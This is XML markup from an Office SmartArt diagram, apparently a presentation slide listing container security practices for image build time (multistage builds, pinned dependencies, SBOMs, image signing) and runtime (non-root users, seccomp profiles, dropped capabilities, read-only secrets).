    <dgm:cxn modelId="{10460CE5-989E-CB44-947B-663385B555FE}" type="presParOf" srcId="{04BD1655-1EB5-464C-A56C-772192CA6588}" destId="{EF16816E-F96F-B44F-9C2F-034F4F97000D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{652B3C57-B299-B443-BB07-C193D161824B}" type="presParOf" srcId="{04BD1655-1EB5-464C-A56C-772192CA6588}" destId="{7C05899C-9E19-7948-83FD-64FE0D63A013}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{7D1A81E5-FF79-D04A-9E79-7276D7943C06}" type="presParOf" srcId="{04BD1655-1EB5-464C-A56C-772192CA6588}" destId="{543CCDCA-6B41-7444-903F-2B020C5293E5}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{8E2419C1-0F7E-0D4B-83D3-6CD2758092CD}" type="presParOf" srcId="{31EE3367-98B5-8F43-9F22-5FE3D95850D3}" destId="{2FF55076-F8B7-3F4E-B038-8859E5F015AF}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{043CF4DD-CE0E-7144-AAC9-151D94E0BD72}" type="presParOf" srcId="{31EE3367-98B5-8F43-9F22-5FE3D95850D3}" destId="{CC8B1878-47C9-AD49-9CA3-13D7EBF68FC6}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{D5105CD0-816E-2F4F-96D3-4C1ACA49315A}" type="presParOf" srcId="{CC8B1878-47C9-AD49-9CA3-13D7EBF68FC6}" destId="{466783E3-D91D-6740-A0AD-BAA9D164EC67}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{BB5224D0-D2E3-5847-8818-20EB8EACFC57}" type="presParOf" srcId="{CC8B1878-47C9-AD49-9CA3-13D7EBF68FC6}" destId="{9F549C44-C1AC-B640-978C-EBCD5A1773F6}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{D845A6CA-83CF-C24F-B736-DE491F607FF7}" type="presParOf" srcId="{CC8B1878-47C9-AD49-9CA3-13D7EBF68FC6}" destId="{59582F2A-1409-5F43-AEE2-3127D4246878}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{6B656731-6256-4241-B595-0C1D6BF5B3F5}" type="presParOf" srcId="{CC8B1878-47C9-AD49-9CA3-13D7EBF68FC6}" destId="{5D90A522-EDB5-8B4E-BB41-2848D8232500}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{F6E425C6-9C0E-6649-A403-BDFBBF0EC8C5}" type="presParOf" srcId="{31EE3367-98B5-8F43-9F22-5FE3D95850D3}" destId="{397154B6-5C98-DB4E-A6D5-C0EF1FC424CE}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{5151972F-D159-7B49-8227-DDDACC146348}" type="presParOf" srcId="{31EE3367-98B5-8F43-9F22-5FE3D95850D3}" destId="{55E66A3D-BE53-C54D-BED8-A7F70E0CBF87}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{AFC5C776-38EA-4B44-98A8-36DFE440D75B}" type="presParOf" srcId="{55E66A3D-BE53-C54D-BED8-A7F70E0CBF87}" destId="{235C5A95-3D59-A04B-B4E2-E577BAFBCC1E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{7415BC74-C639-FC46-9FD6-C71770D15C4B}" type="presParOf" srcId="{55E66A3D-BE53-C54D-BED8-A7F70E0CBF87}" destId="{EA4A4DF3-03E6-DB4B-94B8-F64DB7032DC8}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{763606C5-1C8F-1E40-BAC9-9727B12946F2}" type="presParOf" srcId="{55E66A3D-BE53-C54D-BED8-A7F70E0CBF87}" destId="{DB93B7FF-9217-5A4C-AFA0-D70C5FAD4334}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{29F7F4BA-3657-7147-BA4D-8CA93E70A5DB}" type="presParOf" srcId="{55E66A3D-BE53-C54D-BED8-A7F70E0CBF87}" destId="{711E0870-95E2-314F-9CA4-36D864FC39D2}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{7A04D60F-EC16-704C-9491-77E003C84A59}" type="presParOf" srcId="{31EE3367-98B5-8F43-9F22-5FE3D95850D3}" destId="{290F70A8-3501-4947-9017-59AF05DB5567}" srcOrd="11" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{EC77069C-8346-3D4F-ACDF-60EE56E21E52}" type="presParOf" srcId="{31EE3367-98B5-8F43-9F22-5FE3D95850D3}" destId="{9722D276-F0EB-7F40-AA59-EEE8D0E99908}" srcOrd="12" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{F42634AA-913E-034A-95E1-69513C0F27CE}" type="presParOf" srcId="{9722D276-F0EB-7F40-AA59-EEE8D0E99908}" destId="{52B54FAC-E001-7F4A-9639-7C1E1563BF79}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{1D8CA29B-E220-5D4B-AA46-0CD7CCC7B075}" type="presParOf" srcId="{9722D276-F0EB-7F40-AA59-EEE8D0E99908}" destId="{9763DF48-88A7-0D4E-8F08-0015BA3EF876}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{937FF334-D3DC-F04E-BF9A-121D1C3FC2B8}" type="presParOf" srcId="{9722D276-F0EB-7F40-AA59-EEE8D0E99908}" destId="{D8D3D60F-410B-F943-885A-2C38C84F717B}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7"/>
    <dgm:cxn modelId="{393C41C4-FEFD-C142-945A-D16ED2FEB738}" type="presParOf" srcId="{9722D276-F0EB-7F40-AA59-EEE8D0E99908}" destId="{F2A39681-E09F-1D49-B634-73AFB1F67C8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7ECFD5-3F89-4449-BD29-3D7FE1DB44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1917F-E8EA-480E-932E-DAE99C7A9634}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN" b="1"/>
            <a:t>Image build time</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BDF95FC7-DF44-4B83-817C-F03A39019E2C}" type="parTrans" cxnId="{2FDB6431-85E6-4A05-9219-E289DBF03A3A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6C99D359-F7C0-4C9A-B6A5-74768C974503}" type="sibTrans" cxnId="{2FDB6431-85E6-4A05-9219-E289DBF03A3A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AF040E11-678B-4AD0-B1EF-0400CB438F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 dirty="0"/>
            <a:t>Use multistage builds; keep final image minimal</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2100" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{51F4AD89-7695-4917-931B-4C7345669C7D}" type="parTrans" cxnId="{DEB4F131-BEBD-4A7C-AE80-F34B7E2FFEBD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D4C3F8A6-F7E9-4AFB-84F1-1A4F2A6A45D3}" type="sibTrans" cxnId="{DEB4F131-BEBD-4A7C-AE80-F34B7E2FFEBD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{45A8E3BB-0D7E-4149-AE40-F575663105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/>
            <a:t>Pin dependency versions, build reproducibly</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2100"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FF2B28C3-125C-45B5-80FF-CCDAD474E5CE}" type="parTrans" cxnId="{1BD33DFF-2D19-4250-AC1E-266447EB10A3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BC7883C5-8E14-4AD1-8DE4-E5F9444AE113}" type="sibTrans" cxnId="{1BD33DFF-2D19-4250-AC1E-266447EB10A3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A91C8A11-5729-4D87-BF31-C2132001504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 dirty="0"/>
            <a:t>Generate SBOMs and attach to image (use </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1400" i="1" dirty="0" err="1"/>
            <a:t>syft</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1400" i="1" dirty="0"/>
            <a:t> - </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="1400" i="1" dirty="0"/>
            <a:t>https://</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="1400" i="1" dirty="0" err="1"/>
            <a:t>github.com</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="1400" i="1" dirty="0"/>
            <a:t>/</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="1400" i="1" dirty="0" err="1"/>
            <a:t>anchore</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="1400" i="1" dirty="0"/>
            <a:t>/</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="1400" i="1" dirty="0" err="1"/>
            <a:t>syft</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="2100" dirty="0"/>
            <a:t>)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2100" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8F7E1E43-ABFF-4071-ACF4-D5EF996449AC}" type="parTrans" cxnId="{FCB96310-12AE-42E5-BF3E-CB374A2D3A91}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6F9275E3-0213-4ED0-B10B-902F6EAFBF3C}" type="sibTrans" cxnId="{FCB96310-12AE-42E5-BF3E-CB374A2D3A91}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E5F1DA36-C859-452B-B33C-98D25C8431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100"/>
            <a:t>Sign images (cosign) and use image provenance</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2100"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6C1DBD5A-040E-41F8-932E-615541511EFA}" type="parTrans" cxnId="{062BA403-5FD8-45A9-873F-499A0693A9F9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{906D49A1-FA09-44B9-A8DB-A0EB06E303CC}" type="sibTrans" cxnId="{062BA403-5FD8-45A9-873F-499A0693A9F9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C91D7D89-BECF-4858-B0DE-B4B1F18602A0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN" b="1" dirty="0"/>
            <a:t>Runtime</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1DED7E29-E0CF-4E3C-9345-8C4885544E65}" type="parTrans" cxnId="{FD582A38-D63A-4023-9057-789AD994037F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{09211C77-CA43-414F-9C12-5D9FE5365158}" type="sibTrans" cxnId="{FD582A38-D63A-4023-9057-789AD994037F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F5C9B465-135D-40A1-B00C-8783162587EB}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN" sz="1900" dirty="0"/>
            <a:t>Run as non-root (USER) </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1400" i="1" dirty="0"/>
            <a:t>USER 1001</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1900" dirty="0"/>
            <a:t>, read-only root FS </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1400" i="1" dirty="0"/>
            <a:t>:</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1400" i="1" dirty="0" err="1"/>
            <a:t>ro</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" i="1" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B5C6EC1D-4BED-43CB-8691-A4E95C5D2611}" type="parTrans" cxnId="{E9CCFAE8-BE2B-4B61-A50B-AC371A0930FA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{74BAB99E-B926-4A86-ACAD-189B264A5074}" type="sibTrans" cxnId="{E9CCFAE8-BE2B-4B61-A50B-AC371A0930FA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{75FE253D-E57A-481E-AF8E-0E95004DE5FE}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN" sz="1900" dirty="0"/>
            <a:t>Use seccomp / </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1900" dirty="0" err="1"/>
            <a:t>AppArmor</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1900" dirty="0"/>
            <a:t> profiles </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1400" i="1" dirty="0"/>
            <a:t>docker run –security-opt seccomp=</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1400" i="1" dirty="0" err="1"/>
            <a:t>profile.json</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1400" i="1" dirty="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1400" i="1" dirty="0" err="1"/>
            <a:t>myimage</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" i="1" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6D9DA9E8-0C9A-442D-A7F6-ADBEB7846F84}" type="parTrans" cxnId="{4AC81E40-3B8A-4F31-928B-FF9AFA45E8C3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9AA559BC-C6DD-4256-B0A0-9DF7939FE516}" type="sibTrans" cxnId="{4AC81E40-3B8A-4F31-928B-FF9AFA45E8C3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7AD4E799-12E0-4712-8013-4B14F1C06971}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN" sz="1900" dirty="0"/>
            <a:t>Limit resource usage; use network policies and </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1900" dirty="0" err="1"/>
            <a:t>PodSecurityPolicy</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1900" dirty="0"/>
            <a:t> alternatives</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1900" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DD8B0340-6C52-4627-B7E9-2652BB835836}" type="parTrans" cxnId="{5370CAF8-5FBE-45D3-BC35-88FAB4F43B16}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3964DC45-4D9C-43D6-86D1-6E0F4BEA685E}" type="sibTrans" cxnId="{5370CAF8-5FBE-45D3-BC35-88FAB4F43B16}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{79AE6A3D-D618-4493-A973-2B3CED9D8A48}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN" sz="1900" dirty="0"/>
            <a:t>Mount secrets with least privilege (avoid env vars for long-lived secrets) </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1400" i="1" dirty="0"/>
            <a:t>:</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1400" i="1" dirty="0" err="1"/>
            <a:t>ro</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" i="1" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4D70A5B1-8A7E-421A-B345-89C00147D3F5}" type="parTrans" cxnId="{8A3DC76E-5C36-4F11-9653-EF5D32614379}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{73AA1040-E9BD-4B90-983B-EBF2F176595B}" type="sibTrans" cxnId="{8A3DC76E-5C36-4F11-9653-EF5D32614379}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{179CFE87-1CDA-054A-9959-4AD1923B3252}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN" sz="1900" dirty="0"/>
            <a:t>Drop Linux capabilities (drop ALL, add only what's needed) </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1400" b="0" i="1" dirty="0"/>
            <a:t>drop ALL; add NET_BIND_SERVICE</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0219417A-4ED9-BF47-85EA-507DEF8F389E}" type="parTrans" cxnId="{0CC62E0C-3A4F-3A4F-9A38-BD16AA38C5D8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{28448880-B562-D340-A708-9F7E02371209}" type="sibTrans" cxnId="{0CC62E0C-3A4F-3A4F-9A38-BD16AA38C5D8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{86B69887-D2B5-794B-A24E-0454AE2C4CF7}" type="pres">
      <dgm:prSet presAssocID="{AB7ECFD5-3F89-4449-BD29-3D7FE1DB44E5}" presName="linear" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{69C91215-5240-494A-A232-537391B2A90E}" type="pres">
      <dgm:prSet presAssocID="{6581917F-E8EA-480E-932E-DAE99C7A96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6D0431-3EA8-5E42-A0E0-50F6392B7D4D}" type="pres">
      <dgm:prSet presAssocID="{6581917F-E8EA-480E-932E-DAE99C7A9634}" presName="childText" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="2">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{18EF3945-9971-B946-AA87-23CEA3855FD0}" type="pres">
      <dgm:prSet presAssocID="{C91D7D89-BECF-4858-B0DE-B4B1F18602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0FA6F6-5C54-284A-A17B-56A51AA6905C}" type="pres">
      <dgm:prSet presAssocID="{C91D7D89-BECF-4858-B0DE-B4B1F18602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8F4503-1F87-AA49-86F1-34CA2067FCD5}" type="presOf" srcId="{79AE6A3D-D618-4493-A973-2B3CED9D8A48}" destId="{2F0FA6F6-5C54-284A-A17B-56A51AA6905C}" srcOrd="0" destOrd="4" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{062BA403-5FD8-45A9-873F-499A0693A9F9}" srcId="{6581917F-E8EA-480E-932E-DAE99C7A9634}" destId="{E5F1DA36-C859-452B-B33C-98D25C84313E}" srcOrd="3" destOrd="0" parTransId="{6C1DBD5A-040E-41F8-932E-615541511EFA}" sibTransId="{906D49A1-FA09-44B9-A8DB-A0EB06E303CC}"/>
    <dgm:cxn modelId="{E546B703-8DC1-2F44-BC04-077F722B2FE2}" type="presOf" srcId="{A91C8A11-5729-4D87-BF31-C21320015046}" destId="{7D6D0431-3EA8-5E42-A0E0-50F6392B7D4D}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{0CC62E0C-3A4F-3A4F-9A38-BD16AA38C5D8}" srcId="{C91D7D89-BECF-4858-B0DE-B4B1F18602A0}" destId="{179CFE87-1CDA-054A-9959-4AD1923B3252}" srcOrd="1" destOrd="0" parTransId="{0219417A-4ED9-BF47-85EA-507DEF8F389E}" sibTransId="{28448880-B562-D340-A708-9F7E02371209}"/>
    <dgm:cxn modelId="{D194D80F-A15B-2145-A53D-2135FF663E1F}" type="presOf" srcId="{F5C9B465-135D-40A1-B00C-8783162587EB}" destId="{2F0FA6F6-5C54-284A-A17B-56A51AA6905C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{FCB96310-12AE-42E5-BF3E-CB374A2D3A91}" srcId="{6581917F-E8EA-480E-932E-DAE99C7A9634}" destId="{A91C8A11-5729-4D87-BF31-C21320015046}" srcOrd="2" destOrd="0" parTransId="{8F7E1E43-ABFF-4071-ACF4-D5EF996449AC}" sibTransId="{6F9275E3-0213-4ED0-B10B-902F6EAFBF3C}"/>
    <dgm:cxn modelId="{68018714-FAC0-024F-816D-FFAA7043494C}" type="presOf" srcId="{45A8E3BB-0D7E-4149-AE40-F5756631052E}" destId="{7D6D0431-3EA8-5E42-A0E0-50F6392B7D4D}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{2FDB6431-85E6-4A05-9219-E289DBF03A3A}" srcId="{AB7ECFD5-3F89-4449-BD29-3D7FE1DB44E5}" destId="{6581917F-E8EA-480E-932E-DAE99C7A9634}" srcOrd="0" destOrd="0" parTransId="{BDF95FC7-DF44-4B83-817C-F03A39019E2C}" sibTransId="{6C99D359-F7C0-4C9A-B6A5-74768C974503}"/>
    <dgm:cxn modelId="{DEB4F131-BEBD-4A7C-AE80-F34B7E2FFEBD}" srcId="{6581917F-E8EA-480E-932E-DAE99C7A9634}" destId="{AF040E11-678B-4AD0-B1EF-0400CB438FD5}" srcOrd="0" destOrd="0" parTransId="{51F4AD89-7695-4917-931B-4C7345669C7D}" sibTransId="{D4C3F8A6-F7E9-4AFB-84F1-1A4F2A6A45D3}"/>
    <dgm:cxn modelId="{FD582A38-D63A-4023-9057-789AD994037F}" srcId="{AB7ECFD5-3F89-4449-BD29-3D7FE1DB44E5}" destId="{C91D7D89-BECF-4858-B0DE-B4B1F18602A0}" srcOrd="1" destOrd="0" parTransId="{1DED7E29-E0CF-4E3C-9345-8C4885544E65}" sibTransId="{09211C77-CA43-414F-9C12-5D9FE5365158}"/>
    <dgm:cxn modelId="{4AC81E40-3B8A-4F31-928B-FF9AFA45E8C3}" srcId="{C91D7D89-BECF-4858-B0DE-B4B1F18602A0}" destId="{75FE253D-E57A-481E-AF8E-0E95004DE5FE}" srcOrd="2" destOrd="0" parTransId="{6D9DA9E8-0C9A-442D-A7F6-ADBEB7846F84}" sibTransId="{9AA559BC-C6DD-4256-B0A0-9DF7939FE516}"/>
    <dgm:cxn modelId="{ADD86348-0F5E-A14E-9CAD-DA527C66C80D}" type="presOf" srcId="{C91D7D89-BECF-4858-B0DE-B4B1F18602A0}" destId="{18EF3945-9971-B946-AA87-23CEA3855FD0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{DAFB7351-345C-454A-A4AC-6682E0CFCDDB}" type="presOf" srcId="{75FE253D-E57A-481E-AF8E-0E95004DE5FE}" destId="{2F0FA6F6-5C54-284A-A17B-56A51AA6905C}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{8A3DC76E-5C36-4F11-9653-EF5D32614379}" srcId="{C91D7D89-BECF-4858-B0DE-B4B1F18602A0}" destId="{79AE6A3D-D618-4493-A973-2B3CED9D8A48}" srcOrd="4" destOrd="0" parTransId="{4D70A5B1-8A7E-421A-B345-89C00147D3F5}" sibTransId="{73AA1040-E9BD-4B90-983B-EBF2F176595B}"/>
    <dgm:cxn modelId="{1A020879-AA3E-484C-9227-F5A620458FD7}" type="presOf" srcId="{7AD4E799-12E0-4712-8013-4B14F1C06971}" destId="{2F0FA6F6-5C54-284A-A17B-56A51AA6905C}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
